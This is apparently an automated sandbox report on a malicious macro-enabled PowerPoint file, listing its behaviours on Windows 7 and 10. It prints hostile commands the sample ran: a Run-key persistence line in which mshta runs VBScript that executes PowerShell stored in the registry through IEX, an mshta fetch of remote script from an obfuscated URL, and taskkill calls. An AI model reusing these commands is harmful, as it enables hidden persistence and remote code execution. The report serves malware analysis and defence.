Malware Analysis Report

2025-01-22 12:09

Sample ID 240531-y152mscf39
Target RETO-MALWAREDFIR.ppt
SHA256 a1e8da85d99cfb4c8569ea850691cf6c565b6083114198e17369f3013e4016b5
Tags
persistence macro
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a1e8da85d99cfb4c8569ea850691cf6c565b6083114198e17369f3013e4016b5

Threat Level: Known bad

The file RETO-MALWAREDFIR.ppt was found to be: Known bad.

Malicious Activity Summary

persistence macro

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Checks computer location settings

Adds Run key to start application

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Runs ping.exe

Enumerates system info in registry

Uses Volume Shadow Copy WMI provider

Modifies registry class

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 20:16

Signatures

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 20:16

Reported

2024-05-31 20:45

Platform

win10v2004-20240426-es

Max time kernel

454s

Max time network

1176s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\RETO-MALWAREDFIR.pps" /ou ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\mSHtA.exe C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\ping.exe C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\mSHtA.exe N/A
N/A N/A C:\Windows\SYSTEM32\mSHtA.exe N/A
N/A N/A C:\Windows\SYSTEM32\mSHtA.exe N/A
N/A N/A C:\Windows\SYSTEM32\mSHtA.exe N/A
N/A N/A C:\Windows\SYSTEM32\mSHtA.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\mSHtA.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" C:\Windows\SYSTEM32\mSHtA.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\ping.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\winword.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\RETO-MALWAREDFIR.pps" /ou ""

C:\Windows\SYSTEM32\mSHtA.exe

mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsa

C:\Windows\SYSTEM32\ping.exe

ping

C:\Program Files\Microsoft Office\Root\Office16\winword.exe

winword

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im winword.exe

C:\Windows\system32\taskkill.exe

taskkill /f /im EXCEL.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 j.mp udp
US 67.199.248.16:80 j.mp tcp
US 8.8.8.8:53 iknowyoudidntlikeme.blogspot.com udp
GB 142.250.200.1:443 iknowyoudidntlikeme.blogspot.com tcp
US 8.8.8.8:53 www.blogger.com udp
GB 142.250.178.9:443 www.blogger.com tcp
GB 142.250.178.9:443 www.blogger.com tcp
US 8.8.8.8:53 16.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 1.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 9.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp

Files

memory/744-4-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-5-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-8-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-7-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-6-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-2-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-1-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-0-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-11-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-10-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-12-0x00007FFA8FEB0000-0x00007FFA8FEC0000-memory.dmp

memory/744-15-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-14-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-13-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-9-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-16-0x00007FFA8FEB0000-0x00007FFA8FEC0000-memory.dmp

memory/744-17-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-20-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-19-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-18-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-3-0x00007FFAD232D000-0x00007FFAD232E000-memory.dmp

memory/744-29-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-30-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

memory/744-28-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\94DCF98F-BA59-49E1-8CD7-4F834A46559C

MD5 128b41f3033ece2a490e4fab315b9958
SHA1 eaf01e39cf6baa185d444ee673e2e2b9e11fdfa3
SHA256 d3a2362b831938dc24496361ae958dc20181bc67a28aa0ad77f5802617aed15e
SHA512 62fb3448af0c0eebfac91571df03228c4a1061f62119a9a8094a7924f32ce9f2461172d728b1b7f3542078f9cba9b926787d40df154ca6a4d7594a311dc69e29

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

MD5 8b30d2eb14ebb83271dd10f79e934550
SHA1 c14b65af5de2ae1cb4cd7757e27142977b20e986
SHA256 11dc37610a83a3a804c2ebce9416adefcf892b407a57d580c5966b53c41bd63d
SHA512 c4bb089757589b802d69609dc72113c83ff435b26ff80ee3140eaab079e622067599ae157bf1e4d7be3e3dd5df6de7e9606d805c10c6834b05d73af2ea27a71d

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\f3df91c436730d7a37c58d5f25d9bf4a56fa3a34.tbres

MD5 d836f04438ce703a6203b3d67110ebb9
SHA1 49831f9a674463871db1391caa38a6b59dbb35d7
SHA256 7a143f7d3a2a1538ad7e30f8afeb7499cda5e550f37924dc2cf8838b884a1844
SHA512 3c75d39ecd67195951541b9deed97397b37b565e4a794a9c793f8c140792808e302e75184a9d674bff50284bfd67cfcf1c3b0be751601bc5acf718673d6996c2

memory/744-85-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-88-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-87-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-86-0x00007FFA92310000-0x00007FFA92320000-memory.dmp

memory/744-89-0x00007FFAD2290000-0x00007FFAD2485000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 20:16

Reported

2024-05-31 20:44

Platform

win7-20240220-es

Max time kernel

839s

Max time network

841s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\RETO-MALWAREDFIR.pps"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\mSHtA.exe C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\ping.exe C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" C:\Windows\SysWOW64\mSHtA.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mSHtA.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D5-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B} C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E552-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\winword.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346A-5A91-11CF-8700-00AA0060263B}\TypeLib C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CD-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DA-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493468-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A68-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E550-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493488-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D7-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "FileConverter" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\ = "ThreeDFormat" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A64-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E1-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B}\ = "CustomerData" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ = "TextFrame2" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493454-5A91-11CF-8700-00AA0060263B}\ = "Selection" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\ = "AddIn" C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347F-5A91-11CF-8700-00AA0060263B} C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
